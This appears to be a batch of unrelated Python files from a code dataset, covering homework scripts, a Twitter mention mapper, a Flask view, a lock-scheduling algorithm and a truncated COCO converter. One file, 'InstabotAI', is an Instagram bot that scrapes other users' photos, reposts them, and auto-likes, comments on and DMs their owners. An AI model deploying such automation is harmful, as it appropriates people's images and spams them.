pbar.update(1)\n","sub_path":"training/compression.py","file_name":"compression.py","file_ext":"py","file_size_in_byte":14843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373791515","text":"# -------------------------------------------------------------------------\n# AUTHOR: Siwen Wang\n# FILENAME: decision_tree.py\n# SPECIFICATION: read the file contact_lens.csv and output the decision tree of ID3\n# FOR: CS 4200- Assignment #1\n# TIME SPENT: 20 Minutes\n# -----------------------------------------------------------*/\n\n# IMPORTANT NOTE: DO NOT USE ANY ADVANCED PYTHON LIBRARY TO COMPLETE THIS CODE SUCH AS numpy OR pandas. You have to work here only with standard vectors and arrays\n\n# importing some Python libraries\nfrom sklearn import tree\nimport matplotlib.pyplot as plt\nimport csv\n\ndb = []\nX = []\nY = []\n\n# reading the data in a csv file\nwith open('contact_lens.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n for i, row in enumerate(reader):\n if i > 0: # skipping the header\n db.append(row)\n print(row)\n\n# transform the original training features to numbers and add to the 4D array X. For instance Young = 1, Prepresbyopic = 2, Presbyopic = 3, so X = [[1, 1, 1, 1], [2, 2, 2, 2], ...]]\n# --> add your Python code here\n# X =\ndict = {\"Young\": 1, \"Presbyopic\": 2, \"Prepresbyopic\": 3,\n \"Myope\": 1, \"Hypermetrope\": 2,\n \"No\": 1, \"Yes\": 2,\n \"Reduced\": 1, \"Normal\": 2}\nfor row in db:\n temp = []\n for i in range(len(row)-1):\n temp.append(dict.get(row[i]))\n X.append(temp)\n\n# transform the original training classes to numbers and add to the vector Y. For instance Yes = 1, No = 2, so Y = [1, 1, 2, 2, ...]\n# --> addd your Python code here\ndict2 = {\"No\": 1, \"Yes\": 2}\nfor row in db:\n Y.append(dict2.get(row[len(row)-1]))\n\n# fitting the decision tree to the data\nclf = tree.DecisionTreeClassifier(criterion='entropy')\nclf = clf.fit(X, Y)\n\n# plotting the decision tree\ntree.plot_tree(clf, feature_names=['Age', 'Spectacle', 'Astigmatism', 'Tear'], class_names=['Yes', 'No'], filled=True,\n rounded=True)\nplt.show()\n","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"63307975","text":"'''4、\t求数组中的前n个数的平方和:[14,25,98,75,23,1,4,56,59]\n要求:n需要是input输入,且小于数组长度,不能固定。\n'''\t\nn = int(input())\nlist1 = [14,25,98,75,23,1,4,56,59]\nlist_result = []\nlenth = len(list1)\n\nif n > lenth:\n print(\"error\")\nelse:\n for i in range(n):\n list_result.append(list1[i]**2)\n result = sum(list_result)\nprint(result)\n","sub_path":"1906101033-唐超/20200219作业/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"483451559","text":"#!/usr/bin/env python3\n\nimport sys, os, tempfile, shutil\n\nfolder = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(folder + \"/..\") # Allow us to import files from one level up\n\nimport acquire, analyze, socmap\n\nif __name__ == \"__main__\":\n\tif( len(sys.argv) != 5 ):\n\t\tprint(\"USAGE: %s \" % sys.argv[0])\n\t\tsys.exit(1)\n\torigUserlist = socmap.getUsernames(sys.argv[1])\n\ttweetDir = sys.argv[2]\n\tnumLayers = int(sys.argv[3])\n\toutFileName = sys.argv[4]\n\n\tif( numLayers < 1 ):\n\t\tprint(\"ERROR: Map must include at least one layer\")\n\t\tsys.exit(1)\n\n\t# Work in a random temp directory so we can run multiple instances of\n\t# this script at once\n\tworkDir = tempfile.TemporaryDirectory()\n\tworkDirName = workDir.name\n\n\t# Setup is done, let's read all the tweets we've downloaded\n\tuserlist = origUserlist\n\tfor layer in range(0, numLayers):\n\t\tlayerMentioned = dict()\n\t\tprint(\"Layer %d: Reading data on %d users\" % (layer, len(userlist)))\n\t\tfor username in userlist:\n\t\t\tif( acquire.userTweetsPresent(username, tweetDir) ):\n\t\t\t\tmentions, rts = acquire.getUserReferences(username, tweetDir)\n\t\t\t\tlayerMentioned[username] = list(mentions)\n\t\tprint(\"Layer %d: Saving map\" % layer)\n\t\tuserlist = acquire.flattenUserDictionary(layerMentioned)\n\t\tanalyze.saveNetwork(workDirName, layer, origUserlist, dict(), layerMentioned)\n\n\t# Now move the final map over to the user-requested location\n\torigFileName = workDirName + \"/layer\" + str(numLayers) + \".gml\"\n\tshutil.move(origFileName, outFileName)\n","sub_path":"tools/buildMentionMap.py","file_name":"buildMentionMap.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"428435563","text":"#! /usr/bin/python3\n\"\"\"\n InstabotAI - Instagram Bot With Face Detection\n Intro:\n This bot autoscrape users from variable output -l\n if a face is detected it will repost, repost to\n stories, send DM to users, like and comment that\n photo. If no face is detected in image it will\n scrape the next profile in list.\n\n Github:\n https://github.com/instagrambot/instabotai\n\n Workflow:\n Repost best photos from users to your account\n By default bot checks username_database.txt\n The file should contain one username per line!\n\"\"\"\nimport face_recognition\nimport instagram_scraper as insta\nfrom instabot import Bot, utils\nimport argparse\nimport os\nimport sys\nimport json\nimport time\nimport logging\nfrom random import randint\nfrom tqdm import tqdm\nimport random\n\n# Config\nimage_comment = \"Wow nice picture, i have just reposted it\"\n\n# Logging Output default settings\nlogging.basicConfig(stream=sys.stdout, format='',\n level=logging.INFO, datefmt=None)\nlog = logging.getLogger(__name__)\n\n# Parse arguments from Cli into variables\nparser = argparse.ArgumentParser(add_help=True)\nparser.add_argument('-u', type=str, help=\"username\")\nparser.add_argument('-p', type=str, help=\"password\")\nparser.add_argument('-l', type=str, help=\"therock,kimkardashian\")\nparser.add_argument('-t', type=str, help=\"#hotgirls,#models,#like4like\")\nparser.add_argument('-proxy', type=str, help=\"proxy\")\nparser.add_argument('-file', type=str, help=\"users filename\")\nparser.add_argument('-amount', type=int, help=\"amount\", default=1)\nparser.add_argument('users', type=str, nargs='*', help='users')\nargs = parser.parse_args()\nInstaUsername = args.u\n\n\n\n## Seperate users into list file\ndef help_output():\n if not args.u:\n log.info('python3 example.py -u for username -p password -l therock,kimkardashian -t \"#like4like#follow4follow\"')\n sys.exit()\n\nhelp_output()\n\nuserlist = args.l\ninstagramtags = args.t\n\nusername = InstaUsername\n\nsys.path.append(os.path.join(sys.path[0], '../'))\n\nUSERNAME_DATABASE = 'username_database.txt'\nPOSTED_MEDIAS = 'posted_medias.txt'\n\nwith open('instaprofiles.txt', 'w') as f:\n if f:\n userlist = userlist.replace(\",\", \"\\n\")\n f.write(userlist)\n\n# Open Userdb and put them into a list also write your username to database\ndef open_profiles():\n # Profiles to scrape and repost\n global insta_profiles\n insta_profiles = []\n\n with open(\"instaprofiles.txt\") as f:\n insta_profiles = f.read().splitlines()\n f.close()\n\n # Output userenames in a txt file\n global userdb\n userdb = '\\n'.join(insta_profiles)+'\\n'\n with open('userdb.txt', 'w') as f:\n f.write(userdb)\n\n global username\n time.sleep(1)\n with open('username_database.txt', 'w') as f:\n f.write(username)\n\nnumber_last_photos = 3\nx = 0\n\ndef watch_stories():\n args.u = InstaUsername\n\n if len(sys.argv) >= 2:\n print(\n \"\"\"\n Going to get '%s' likers and watch their stories (and stories of their likers too).\n \"\"\" % (insta_profiles[x])\n )\n user_to_get_likers_of = bot.convert_to_user_id(insta_profiles[x])\n else:\n print(\n \"\"\"\n Going to get your likers and watch their stories (and stories of their likers too).\n You can specify username of another user to start (by default we use you as a starting point).\n \"\"\"\n )\n user_to_get_likers_of = bot.user_id\n\n current_user_id = user_to_get_likers_of\n while True:\n try:\n # GET USER FEED\n if not bot.api.get_user_feed(current_user_id):\n print(\"Can't get feed of user_id=%s\" % current_user_id)\n\n # GET MEDIA LIKERS\n user_media = random.choice(bot.api.last_json[\"items\"])\n if not bot.api.get_media_likers(media_id=user_media[\"pk\"]):\n print(\n \"Can't get media likers of media_id='%s' by user_id='%s'\" % (user_media[\"pk\"], current_user_id)\n )\n\n likers = bot.api.last_json[\"users\"]\n liker_ids = [\n str(u[\"pk\"]) for u in likers if not u[\"is_private\"] and \"latest_reel_media\" in u\n ]\n\n # WATCH USERS STORIES\n if bot.watch_users_reels(liker_ids[:15]):\n print(\"Total stories viewed: %d\" % bot.total[\"stories_viewed\"])\n\n # CHOOSE RANDOM LIKER TO GRAB HIS LIKERS AND REPEAT\n current_user_id = random.choice(liker_ids)\n\n if random.random() < 0.05:\n current_user_id = user_to_get_likers_of\n print(\"Sleeping and returning back to original user_id=%s\" % current_user_id)\n time.sleep(10 * random.random() + 10)\n\n except Exception as e:\n # If something went wrong - sleep long and start again\n print(\"Exception:\", str(e))\n current_user_id = user_to_get_likers_of\n time.sleep(10 * random.random() + 10)\n\ndef increment():\n global x\n x = x+1\n\n\ndef bot_upload_photo(instapath, tags, media_id):\n ''' Upload photo to instagram'''\n bot.api.upload_photo(instapath, tags)\n log.info(\"Reposted: \" + media_id)\n\ndef bot_like(media_id):\n ''' Like image on instagram '''\n bot.api.like(media_id)\n log.info(\"Liked media id: \" + media_id)\n\ndef bot_comment(media_id, image_comment):\n ''' Comment image on instagram '''\n bot.comment(media_id, image_comment)\n log.info(\"Commented: \" + media_id)\n\ndef send_dm(scraped_user_id):\n ''' send dm on instagram '''\n bot.send_message(\"hi i just reposted your photo\", scraped_user_id)\n log.info(\"Private dm send to \" + scraped_user_id)\n log.info(\"Wait 2200 - 2600 sec for next repost\")\n\ndef file_creator(file_ending, encoding, write):\n ''' File creator for log files '''\n with open(username + file_ending, encoding) as f:\n file_output = f.write(str(write))\n return file_output\n\ndef random_sleep(number1, number2):\n ''' Random sleep between two numbers'''\n time_sleep = time.sleep(randint(number1, number2))\n return time_sleep\n\n\ndef InstaImageScraper():\n ''' Scrape image on profiles '''\n imgScraper = insta.InstagramScraper(usernames=[insta_profiles[x]],\n maximum=number_last_photos,\n media_metadata=True, latest=True,\n media_types=['image'])\n imgScraper.scrape()\n print(\"image scraping is running, please wait 50 seconds.\")\n\ndef face_detection(path_to_image, new_media_id, media_id):\n ''' Face Detection for image '''\n image = face_recognition.load_image_file(path_to_image)\n face_locations = face_recognition.face_locations(image)\n # If no face located scrape the next profile\n if not face_locations:\n log.info(\"There is no Face Detected scraping next profile\")\n increment()\n log.info(scraped_user)\n random_sleep(1, 6)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n else:\n log.info(\"There is a Face Detected scraping and posting this image\")\n log.info(scraped_user)\n random_sleep(1, 2)\n log.info(\"Media Id:\" + str(media_id))\n log.info(\"Face Location: \" + str(face_locations))\n log.info(\"Path to image: \" + path_to_image)\n\n# Instagram manipulate image and repost them\n# While x is less than instaprofiles loop this\ndef instascraper(bot, new_media_id, path=POSTED_MEDIAS):\n InstaImageScraper()\n random_sleep(1, 5)\n global x\n while x < len(insta_profiles):\n try:\n # Open insta_profiles[x] and it's scraped\n # json file take first image location\n with open(insta_profiles[x]\n + '/' + insta_profiles[x] + '.json', 'r') as j:\n global scraped_user\n scraped_user = insta_profiles[x]\n json_data = json.load(j)\n time.sleep(randint(1, 10))\n newstr = (json_data[\"GraphImages\"][0][\"display_url\"])\n # Output media id of image\n media_id = (json_data[\"GraphImages\"][0][\"id\"])\n log.info(\"Found media id: \" + media_id)\n random_sleep(1, 5)\n logging.info(\"image string generated \" + newstr)\n time.sleep(randint(1, 5))\n imgUrl = newstr.split('?')[0].split('/')[-1]\n global instapath\n instapath = insta_profiles[x] + '/' + imgUrl\n logging.info(\"Found Instagram Path to Image: \" + instapath)\n random_sleep(1, 5)\n global tags\n tags = \"@\" + insta_profiles[x] + \" \" + instagramtags\n # Execute face_detection\n face_detection(instapath, new_media_id, media_id)\n # Append username info to csv file\n try:\n file_creator('.tsv', 'a+', saveStats)\n with open(username + '.tsv', 'r') as f:\n last_line = f.readlines()[-2].replace(\"False\", \"\")\n log.info(\"Date - Time - Followers - Following - Posts\")\n log.info(last_line)\n\n # Write username tsv file if it does not exist\n except:\n file_creator('.tsv', 'w+', saveStats)\n with open(username + '.tsv', 'r') as f:\n last_line = f.readlines()[-1]\n log.info(\"Date - Time - Followers - Following - Posts\")\n log.info(last_line)\n\n # Append username info to csv file\n try:\n file_creator('_posted.tsv', 'a+', imgUrl + '\\n')\n with open(username + '_posted.tsv', 'r') as f:\n last_line = f.readlines()[-1]\n with open(username + '_posted.tsv', 'r') as f:\n all_lines = f.readlines()[0:-2]\n all_lines = (str(all_lines))\n log.info(\"Posted Media\")\n log.info(last_line)\n # if imgurl is in file username_posted scrape next profile\n if str(imgUrl) in str(all_lines):\n try:\n log.info(\"Image found in database scraping next profile\")\n x += 1\n log.info(\"image found of: \" + scraped_user)\n random_sleep(1, 2)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n\n except:\n log.info(\"image found of: \" + scraped_user)\n x += 1\n random_sleep(1, 2)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n\n # Write username tsv file if it does not exist\n except:\n file_creator('_posted.tsv', 'a+', imgUrl + '\\n')\n with open(username + '_posted.tsv', 'r') as f:\n last_line = str(f.readlines()[-1])\n all_lines = str(f.readlines()[0:-2])\n\n log.info(\"Posted media\")\n logging(last_line)\n if imgUrl in all_lines:\n log.info(\"Image found in database scraping next profile\")\n x += 1\n log.info(\"image of \" + scraped_user)\n random_sleep(1, 2)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n\n # Execute the repost function\n random_sleep(1, 2)\n # Repost image as story\n log.info(\"Waiting\")\n random_sleep(100, 120)\n bot.upload_story_photo(instapath)\n log.info(\"Photo Uploaded to Story\")\n # Like Image\n bot_like(media_id)\n random_sleep(10, 25)\n # Comment on Image\n bot_comment(media_id, image_comment)\n random_sleep(11, 26)\n # Repost image\n bot_upload_photo(instapath, tags, media_id)\n random_sleep(2, 5)\n print(user_id)\n scraped_user_id = bot.get_user_id_from_username(scraped_user)\n send_dm(scraped_user_id)\n random_sleep(2,5)\n# watch_stories()\n random_sleep(3200, 3800)\n except:\n log.info(\"image set to private \" + scraped_user)\n x += 1\n random_sleep(10, 22)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n x += 1\n x = 0\n random_sleep(5, 10)\n instascraper(bot, new_media_id, path=POSTED_MEDIAS)\n\n\n# All main stuff gets executed\nopen_profiles()\nrandom_sleep(5, 10)\nbot = Bot()\nbot.login(username=args.u, password=args.p, proxy=args.proxy)\nrandom_sleep(5, 10)\nuser_id = bot.get_user_id_from_username(args.u)\nusername = bot.get_username_from_user_id(user_id)\nsaveStats = bot.save_user_stats(username)\nusers = None\nif args.users:\n users = args.users\nelif args.file:\n users = utils.file(args.file).list\ninstascraper(bot, users, args.amount)\n","sub_path":"instabotai/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"516940913","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# __author__: Yxn\n# date: 2016/10/17\n\n\nfrom flask import Blueprint, render_template\nfrom flask_login import login_required\nfrom ..forms.svn import Svn\n\nsvn = Blueprint('svn',\n __name__,\n url_prefix='/dashboard/svn')\n\n\n@svn.route('/')\n# @login_required\ndef index():\n form = Svn()\n\n return render_template('svn/index.html', form=form)\n","sub_path":"app/views/svn.py","file_name":"svn.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"558337456","text":"import Ships\nimport networkx as nx\n\nT = Ships.T\nA = Ships.ships\narrivals = Ships.arrival_times\npositions = Ships.arrival_positions\nsp = []\n\n\ndef find_ak_for_s(curr_ship):\n curr_position = curr_ship.arrival_position\n k = 0\n\n for i in range(len(A)):\n arrival_time = A[i].arrival_time\n interval_end = curr_ship.arrival_time + T\n if arrival_time < interval_end and A[i].arrival_position != curr_position:\n k += 1\n if arrival_time >= interval_end:\n break\n\n return k\n\n\ndef calc_cost_leaving_s(curr_ship):\n cost = 0\n\n for a in A:\n\n if curr_ship.arrival_time > a.arrival_time and curr_ship.arrival_position == a.arrival_position:\n cost += curr_ship.arrival_time - a.arrival_time\n elif curr_ship.arrival_time + T > a.arrival_time and curr_ship.arrival_position != a.arrival_position:\n cost += curr_ship.arrival_time + T - a.arrival_time\n\n return cost\n\n\ndef calc_cost_enter_t(curr_ship, poss):\n cost = 0\n all_ships = A.copy()\n del all_ships[0:poss + 1]\n\n if all_ships:\n for a in all_ships:\n\n interval_start = curr_ship.arrival_time\n interval_end = curr_ship.arrival_time + 2 * T\n if a.arrival_time >= interval_start:\n while interval_start < A[len(A) - 1].arrival_time:\n if interval_start < a.arrival_time <= interval_end and curr_ship.arrival_position == a.arrival_position:\n cost += interval_end - a.arrival_time\n elif interval_start + T < a.arrival_time <= interval_end + T and curr_ship.arrival_position != a.arrival_position:\n cost += interval_end + T - a.arrival_time\n\n interval_start += (2 * T)\n interval_end += (2 * T)\n\n return cost\n\n\n# This function will find subscript l (number of ships arriving at positiom 1 - p(b))\n# of node b_l in layer L(b) for block1 and block2\ndef block_bl(t_a, t_b, block):\n b_l = 0\n block_length = block[2]\n for i in range(len(A)):\n\n if block_length > 1:\n if t_a.arrival_time + (block_length - 1) * T < arrivals[i] <= t_b.arrival_time + T and positions[i] != t_b.arrival_position:\n b_l += 1\n else:\n if t_a.arrival_time < arrivals[i] <= t_b.arrival_time + T and positions[i] != t_b.arrival_position:\n b_l += 1\n\n return b_l\n\n\ndef block2_cost(a_ship, a_poss, b_ship, block):\n cost = 0\n all_ships = A.copy()\n del all_ships[0: a_poss + 1]\n t_a = a_ship.arrival_time\n t_b = b_ship.arrival_time\n\n if all_ships:\n for a in all_ships:\n\n numb_of_lock_movm_left = block[2]\n\n if a_ship.arrival_position == b_ship.arrival_position:\n\n if a_ship.arrival_position == a.arrival_position:\n\n interval_start = t_a\n mid_interval = interval_start + 2 * T\n numb_of_lock_movm_left -= 2\n interval_end = t_b\n\n # Chech if ship's arrival time is before or after interval\n if interval_end <= a.arrival_time or interval_start >= a.arrival_time:\n continue\n\n cost = calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, a_ship, b_ship)\n\n else:\n interval_start = t_a + T\n numb_of_lock_movm_left -= 3\n interval_end = t_b + T\n\n if interval_end <= a.arrival_time or interval_start >= a.arrival_time:\n continue\n\n if numb_of_lock_movm_left < 0:\n mid_interval = interval_start\n else:\n mid_interval = interval_start + 2 * T\n\n cost = calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, a_ship, b_ship)\n\n else:\n if a_ship.arrival_position == a.arrival_position:\n\n interval_start = t_a\n mid_interval = interval_start + 2 * T\n numb_of_lock_movm_left -= 2\n interval_end = t_b + T\n\n if interval_end <= a.arrival_time or interval_start >= a.arrival_time:\n continue\n\n cost = calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, a_ship, b_ship)\n\n else:\n interval_start = t_a + T\n numb_of_lock_movm_left -= 3\n interval_end = t_b\n\n if interval_end <= a.arrival_time or interval_start >= a.arrival_time:\n continue\n\n if numb_of_lock_movm_left < 0:\n mid_interval = interval_start\n else:\n mid_interval = interval_start + 2 * T\n\n cost = calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, a_ship, b_ship)\n\n return cost\n\n\n# Chech if ship can be transfered within the next lock movement,\n# if lock movement is possible within current interval,\n# by incrising the number of mid_intervals by 2T until there is no more movements left.\n# If there is no more movements left, it means that ship will be moved at the end of the interval.\ndef calc_cost(a, cost, interval_end, interval_start, mid_interval, numb_of_lock_movm_left, aship, bship):\n while True:\n\n if numb_of_lock_movm_left <= 0:\n cost += interval_end - a.arrival_time\n break\n\n if interval_start < a.arrival_time <= mid_interval:\n cost += mid_interval - a.arrival_time\n break\n\n if numb_of_lock_movm_left > 0:\n if numb_of_lock_movm_left - 2 <= 0 or aship.arrival_position != bship.arrival_position:\n mid_interval += numb_of_lock_movm_left * T\n numb_of_lock_movm_left = 0\n else:\n mid_interval += 2 * T\n numb_of_lock_movm_left -= 2\n continue\n\n return cost\n\n\ndef create_blocks(a_ship, a_poss, b_poss, block1, block2, g):\n block_lenght = int((A[b_poss].arrival_time - a_ship.arrival_time) / T)\n if a_ship.arrival_time + 2 * T <= A[b_poss].arrival_time and a_ship.arrival_position == A[b_poss].arrival_position:\n if block_lenght % 2 != 0:\n block_lenght -= 1\n\n block2.append((a_poss + 1, b_poss + 1, block_lenght))\n block2_bl = block_bl(a_ship, A[b_poss], block2[-1])\n # print(str(a_poss + 1) + \"_top, \" + str(b_poss + 1) + \"_\" + str(block2_bl) + \", \" + str(block2_cost(a_ship, a_poss, A[b_poss], block2[-1])))\n g.add_edge(str(a_poss + 1) + \"_top\", str(b_poss + 1) + \"_\" + str(block2_bl), weight=block2_cost(a_ship, a_poss, A[b_poss], block2[-1]))\n elif a_ship.arrival_time + T <= A[b_poss].arrival_time and a_ship.arrival_position != A[b_poss].arrival_position:\n if block_lenght % 2 == 0:\n block_lenght -= 1\n\n if block_lenght == 1:\n block1.append((a_poss + 1, b_poss + 1, block_lenght))\n b_l = str(b_poss + 1) + \"_\" + str(block_bl(a_ship, A[b_poss], block1[-1]))\n block1_add_edge(g, a_poss, b_l, block1_cost(a_ship, a_poss, A[b_poss]), a_ship, A[b_poss])\n else:\n block2.append((a_poss + 1, b_poss + 1, block_lenght))\n block2_bl = block_bl(a_ship, A[b_poss], block2[-1])\n # print(str(a_poss + 1) + \"_top, \" + str(b_poss + 1) + \"_\" + str(block2_bl)+ \", \" + str(block2_cost(a_ship, a_poss, A[b_poss], block2[-1])))\n g.add_edge(str(a_poss + 1) + \"_top\", str(b_poss + 1) + \"_\" + str(block2_bl), weight=block2_cost(a_ship, a_poss, A[b_poss], block2[-1]))\n\n\ndef block1_cost(a_ship, a_poss, b_ship):\n cost = 0\n all_ships = A.copy()\n del all_ships[0: a_poss + 1]\n t_a = a_ship.arrival_time\n t_b = b_ship.arrival_time\n\n if all_ships:\n for a in all_ships:\n if a_ship.arrival_position == a.arrival_position:\n\n interval_start = t_a\n interval_end = t_b + T\n\n if interval_start < a.arrival_time <= interval_end:\n cost += interval_end - a.arrival_time\n\n else:\n interval_start = t_a + T\n interval_end = t_b\n\n if interval_start < a.arrival_time <= interval_end:\n cost += interval_end - a.arrival_time\n\n return cost\n\n\n# Add edges for block1\n# from a_k, where k = {0, ... , n) to b_l\ndef block1_add_edge(g, poss, b_l, cost, a_ship, b_ship):\n for i in range(len(A) + 1):\n # cost of block1 edges does change, every edge has different cost, but becouse of how _k is chosen,\n # i.e. it is the number of waiting ships,\n # change in cost will not effect the total waiting time becouse the shortest path\n # will only be able to leave by the right edge,\n # right in respect to the total waiting time\n cost2 = i * (b_ship.arrival_time - a_ship.arrival_time - T)\n print(\"BLOCK 1: \" + str(poss + 1) + \"_\" + str(i) + \", \" + b_l + \", \" + str(cost + cost2))\n g.add_edge(str(poss + 1) + \"_\" + str(i), b_l, weight=cost + cost2)\n\n\ndef create_edges_leaving_s(g, a):\n s_ak_edge = str(a + 1) + '_' + str(find_ak_for_s(A[a]))\n cost_leaving_s = calc_cost_leaving_s(A[a])\n g.add_edge('s', s_ak_edge, weight=cost_leaving_s)\n\n\ndef create_0_cost_edges(g, a, k, a_top):\n a_k = str(a + 1) + '_' + str(k)\n g.add_edge(a_k, a_top, weight=0)\n\n\ndef create_edges_entering_t(g, a, a_top):\n cost_entering_t = calc_cost_enter_t(A[a], a)\n # print(a_top + ' -- > t cost = ' + str(cost_entering_t))\n g.add_edge(a_top, 't', weight=cost_entering_t)\n\n\ndef lockmaster():\n # print(\"\\nLockmaster - Polynomial time algorithm\")\n\n g = nx.DiGraph() # Create acyclic graph g\n g.add_node('s')\n g.add_node('t')\n\n blocks1 = [] # List of blocks. Each block is a tuple (start, end, block_lenght)\n blocks2 = []\n\n for a in range(len(A)):\n\n a_top = str(a + 1) + '_top'\n\n # Creating edges entering node t\n create_edges_entering_t(g, a, a_top)\n\n # Creating edges leaving node s\n create_edges_leaving_s(g, a)\n\n for k in range(len(A) + 1):\n\n # Creating 0-cost edges\n create_0_cost_edges(g, a, k, a_top)\n\n # Creating block1 and block2 edges\n if k > len(A) - 1:\n continue\n else:\n create_blocks(A[a], a, k, blocks1, blocks2, g)\n\n # Find shortest path\n # dijkstra's complexity - O( V^2 )\n # V = ( n * (n + 2) + 2) -- #rows * #columns + nodes s and t\n paths = nx.all_shortest_paths(g, source='s', target='t', method='dijkstra', weight='weight')\n path_lenght = nx.shortest_path_length(g, source='s', target='t', weight='weight')\n\n with open(\"..\\..\\\\visualisation\\lockmasterApp\\data\\shortestPaths.txt\", \"w\") as f:\n f.truncate(0)\n f.write(str(path_lenght) + \"\\n\")\n for p in paths:\n sp.append(p)\n f.write(str(p) + '\\n')\n # print('shortest s --> t path ' + str(p) + ' with cost = ' + str(path_lenght))\n f.write(str(blocks2))\n\n####################################################################################################\n####################################################################################################\n####################################################################################################\n","sub_path":"LockMaster/lockmaster/scheduling_parallel_batching_machines.py","file_name":"scheduling_parallel_batching_machines.py","file_ext":"py","file_size_in_byte":11601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"35124458","text":"import json\nimport re\nimport fnmatch\nfrom PIL import Image\nfrom pylab import *\nimport os\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\"\"\"\n由via标注的2个关键点转成coco格式3个关键点,visible为实际值,\n\"\"\"\n\nIMAGE_DIR = \"/home/kilox/Database/Done/0_meter_recognition/pointer_dataset/annotations/cache/test/1\"\nANNOTATION_DIR = \"/home/kilox/Database/Done/0_meter_recognition/pointer_dataset/annotations/cache/test/test.json\"\nsave_dir = \"/home/kilox/Database/Done/0_meter_recognition/pointer_dataset/annotations/cache/test/test_result_json.json\"\n\nnum_keypoints = 3\n\n\nINFO = {\n \"description\": \"Keypoints Location of Pointer Dataset\",\n \"url\": \"https://yigaoyi.github.io/\",\n \"version\": \"1.0\",\n \"year\": 2019,\n \"contributor\": \"Kilox PerXeption Group\",\n \"date_created\": datetime.datetime.utcnow().isoformat(' ')\n}\n\nLICENSES = [\n {\n \"id\": 1,\n \"name\": \"Attribution-NonCommercial-ShareAlike License\",\n \"url\": \"http://creativecommons.org/licenses/by-nc-sa/2.0/\"\n }\n]\n\nCATEGORIES = [\n {\n 'id': 1,\n 'name': 'pointer',\n 'supercategory': 'pointer',\n 'keypoints': [\"start\", \"center\", \"tail\"],\n 'skeleton': [[1, 2], [2, 3]]\n }\n]\n\n\nclass FC:\n \"\"\"For a colorful print\n DO NOT CHANGE 'ROS', we need a uniform style in ROS\n \"\"\"\n HEADER = '\\033[1m\\033[95m[KiloX Pointer]: '\n OKBLUE = '\\033[1m\\033[94m[KiloX Pointer]: '\n OKGREEN = '\\033[1m\\033[92m[KiloX Pointer]: '\n WARN = '\\033[1m\\033[93m[KiloX Pointer]: '\n FAIL = '\\033[1m\\033[91m[KiloX Pointer]: '\n END = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n def __init__(self):\n pass\n\n\ndef filter_for_jpeg(root, files):\n \"\"\"filter jpg files in dictionary\n\n :param root:\n :param files:\n :return:\n \"\"\"\n file_types = ['*.jpeg', '*.jpg']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n return files\n\n\ndef create_image_info(image_id, file_name, image_size,\n date_captured=datetime.datetime.utcnow().isoformat(' '),\n license_id=1, coco_url=\"\", flickr_url=\"\"):\n image_info = {\n \"id\": image_id,\n \"file_name\": file_name,\n \"width\": image_size[0],\n \"height\": image_size[1],\n \"date_captured\": date_captured,\n \"license\": license_id,\n \"coco_url\": coco_url,\n \"flickr_url\": flickr_url\n }\n\n return image_info\n\n\ndef create_annotation_info(annotation_id, image_id, category_info, binary_mask, keypoints, num_keypoints,\n image_size=None, tolerance=2, bounding_box=None, ):\n annotation_info = {\n \"id\": annotation_id,\n \"image_id\": image_id,\n \"category_id\": category_info[\"id\"],\n \"iscrowd\": 0,\n \"area\": 0,\n \"bbox\": bounding_box.tolist(),\n \"segmentation\": [],\n \"num_keypoints\": num_keypoints,\n \"keypoints\": keypoints\n }\n\n return annotation_info\n\n\ndef main():\n coco_output = {\n \"info\": INFO,\n \"licenses\": LICENSES,\n \"categories\": CATEGORIES,\n \"images\": [],\n \"annotations\": []\n }\n count = 0\n for root, _, files in os.walk(IMAGE_DIR):\n image_files = filter_for_jpeg(root, files)\n # go through each image\n for image_filename in image_files:\n print(image_filename)\n image = Image.open(image_filename)\n index = image_filename.rfind('.')\n afdex = image_filename.rfind('/')\n image_id = int(image_filename[afdex + 1:index])\n image_id = \"%d\" % image_id\n image_id = int(image_id)\n image_info = create_image_info(\n image_id, os.path.basename(image_filename), image.size)\n coco_output[\"images\"].append(image_info)\n\n file_str = open(ANNOTATION_DIR)\n setting = json.load(file_str)\n get_obj = json.dumps(setting)\n info = re.findall(image_filename[afdex + 1:index] + r'.jpg+\\d+', get_obj)\n if not info:\n print(\"{} is not exit in annotations!\".format(image_filename))\n else:\n count = count + 1\n\n obj_str = json.dumps(setting[\"\".join(info)])\n\n a = int(\"\".join(re.findall(r\"\\\"x\\\"\\: (.+?)\\,\", obj_str)))\n b = int(\"\".join(re.findall(r\"\\\"y\\\"\\: (.+?)\\,\", obj_str)))\n try:\n c = int(\"\".join(re.findall(r\"\\\"width\\\"\\: (.+?)\\,\", obj_str)))\n d = 